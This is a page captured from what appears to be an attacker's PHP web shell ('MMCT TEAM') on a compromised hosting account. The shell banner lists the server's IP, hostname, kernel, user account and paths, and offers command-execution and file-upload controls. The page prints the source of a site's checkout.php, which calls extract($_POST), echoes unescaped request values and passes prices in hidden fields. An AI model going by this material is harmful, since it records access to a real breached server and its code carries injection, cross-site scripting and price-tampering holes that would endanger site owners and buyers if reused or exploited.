MMCT TEAM
Server IP : 162.214.80.37  /  Your IP : 216.73.216.83
Web Server : Apache
System : Linux sh013.webhostingservices.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : imyrqtmy ( 2189)
PHP Version : 8.2.18
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home2/imyrqtmy/public_html/Welkinsway/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/imyrqtmy/public_html/Welkinsway/checkout.php
<?php
session_start();

// $cartv = $_SESSION['cartv'];

extract($_POST);

// print_r($_POST);

?>
<!DOCTYPE html>
<html lang="en">

<?php include'include/head.php'; ?>
<link rel="stylesheet" type="text/css" href="css/bootstrap.min.css"/>
<link rel="stylesheet" type="text/css" href="css/animate.css"/>
<link rel="stylesheet" type="text/css" href="css/flaticon.css"/>
<link rel="stylesheet" type="text/css" href="css/font-awesome.css"/>
<link rel="stylesheet" type="text/css" href="css/themify-icons.css"/>
<link rel="stylesheet" type="text/css" href="css/slick.css">
<link rel="stylesheet" type="text/css" href="css/prettyPhoto.css">
<link rel="stylesheet" type="text/css" href="css/shortcodes.css"/>
<link rel="stylesheet" type="text/css" href="css/main.css"/>
<link rel="stylesheet" type="text/css" href="css/inner-page.css"/>
<link rel="stylesheet" type="text/css" href="css/megamenu.css"/>
<link rel="stylesheet" type="text/css" href="css/responsive.css"/>

</head>

<body>

    <!--page start-->
    <div class="page">
       

        <!--header start-->
       <?php include'include/header.php'; ?>
        <!--header end-->


        <!-- page-title -->
        <div class="ttm-page-title-row">
            <div class="ttm-page-title-row-inner">
                <div class="container">
                    <div class="row align-items-center">
                        <div class="col-lg-12">
                            <div class="page-title-heading">
                                <h2 class="title">Cart Details</h2>
                            </div>
                            <div class="breadcrumb-wrapper">
                                <span>
                                    <a title="Homepage" href="index.php">Home</a>
                                </span>
                                <span>Cart Details</span>
                            </div>
                        </div>
                    </div>
                </div>
            </div>                    
        </div>
        <!-- page-title end -->


    <!--site-main start-->
    <div class="site-main">




        <!--- conatact-section -->
        <section class="ttm-row conatact-section clearfix">
            <div class="container">
                <!-- row -->
                <div class="row">
                    <div class="col-lg-12">
                        <div class="ttm-col-bgcolor-yes ttm-bg ttm-bgcolor-white z-index-2 spacing-5 box-shadow mt_15 mb_15">
                            <div class="ttm-col-wrapper-bg-layer ttm-bg-layer"></div>
                            <div class="row">
                                 <div class="col-lg-12">
                                     <div class="single-services-box ">
                                    <table class="table table-hover table-bordered">
                                        <thead>
                                            <tr>
                                                <th class="product-name">Name</th>
                                                <th class="product-price">Unit Price</th>
                                                <th class="product-quantity">Quantity</th>
                                                <th class="product-subtotal">Total</th>
                                            </tr>
                                        </thead>
                                        <tbody>
                                                                                        <tr>
                                                
                                                <td class="product-name"><a href="#">Registration for India-International</a></td>
                                                <td class="product-price"><span>₹</span><?php echo $uprice; ?></td>
                                                <td class="product-quantity"><?php echo $qty; ?></td>
                                                <td class="subtotal"><span class="amount"><span class="symbol">₹</span><?php echo $subtotal; ?></span>
                                                </td>
                                            </tr>
                                                                                    </tbody>
                                        <tfoot>
                                            <tr>
                                                <th colspan="3" style="text-align: right;">Total Price :</th>
                                                <th>₹<?php echo $totalp; ?>/-</th>
                                                
                                                
                                            </tr>
                                        </tfoot>
                                        
                                    </table>
                                </div>
                                
                                <br>
                                
                                <div class="single-services-box " style="text-align:justify;">
                                    <form method="post" action="mail.php" id="on_payment">
                                       <div class="row">

                                            <div class="col-lg-6 col-md-6">
                                                <div class="form-group">
                                                    <label>First Name <span class="required">*</span></label>
                                                    <input type="text" class="form-control" name="fname" required="">
                                                </div>
                                            </div>
                                            <div class="col-lg-6 col-md-6">
                                                <div class="form-group">
                                                    <label>Last Name <span class="required">*</span></label>
                                                    <input type="text" class="form-control" name="lname" required="">
                                                </div>
                                            </div>
                                            <div class="col-lg-6 col-md-6">
                                                <div class="form-group">
                                                    <label>Email Address <span class="required">*</span></label>
                                                    <input type="email" class="form-control" name="email" required="">
                                                </div>
                                            </div>
                                            <div class="col-lg-6 col-md-6">
                                                <div class="form-group">
                                                    <label>Phone <span class="required">*</span></label>
                                                    <input type="text" class="form-control" name="phone" minlength="10" maxlength="10" required="">
                                                </div>
                                            </div>
                                            
                                            <input type="hidden" name="pname" class="subtotal" value="Registration for India-International">
                                                        <input type="hidden" name="unitprice" class="totalp" value="<?php echo $uprice; ?>">
                                                        <input type="hidden" name="qty" class="subtotal" value="<?php echo $qty; ?>">
                                                        <input type="hidden" name="subtotal" class="subtotal" value="<?php echo $subtotal; ?>">
                                                        <input type="hidden" name="totalp" class="totalp" value="<?php echo $totalp; ?>">
                                            
                                        </div>
                                        <br>
                                        <div style="text-align: right;">
                                                <button class="ttm-btn ttm-btn-size-md ttm-btn-shape-square ttm-btn-style-border ttm-btn-color-dark" type="submit"> Proceed to Payment</button>

                                        </div>
                                    </form>
                                </div>
                                 </div>
                            </div>
                        </div>
                    </div>
                </div><!-- row end -->                
            </div>
        </section>
        <!-- conatact-section end -->


        <!--google_map-->
      

      
    </div><!--site-main end-->


    <!--footer start-->
    <?php include'include/footer.php'; ?>
    <!--footer end-->


    <!--back-to-top start-->
    <a id="totop" href="#top">
        <i class="fa fa-angle-up"></i>
    </a>
    <!--back-to-top end-->

</div><!-- page end -->


    <!-- Javascript -->

    <script src="js/jquery.min.js"></script>
    <script src="js/tether.min.js"></script>
    <script src="js/bootstrap.min.js"></script> 
    <script src="js/jquery.easing.js"></script>    
    <script src="js/jquery-waypoints.js"></script>    
    <script src="js/jquery-validate.js"></script> 
    <script src="js/jquery.prettyPhoto.js"></script>
    <script src="js/slick.min.js"></script>
    <script src="js/numinate.min.js"></script>
    <script src="js/imagesloaded.min.js"></script>
    <script src="js/jquery-isotope.js"></script>
    <script src="js/main.js"></script>
    <!-- Javascript end-->

    <!--<script src="js/map.js"></script>-->
    <!--<script src="https://maps.google.com/maps/api/js?sensor=false"></script>-->
    <!-- Javascript end-->



</body>

<!-- Mirrored from themetechmount.net/html/kaccy/contact-us-1.html by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 07 Oct 2023 10:23:39 GMT -->
</html>

MMCT - 2023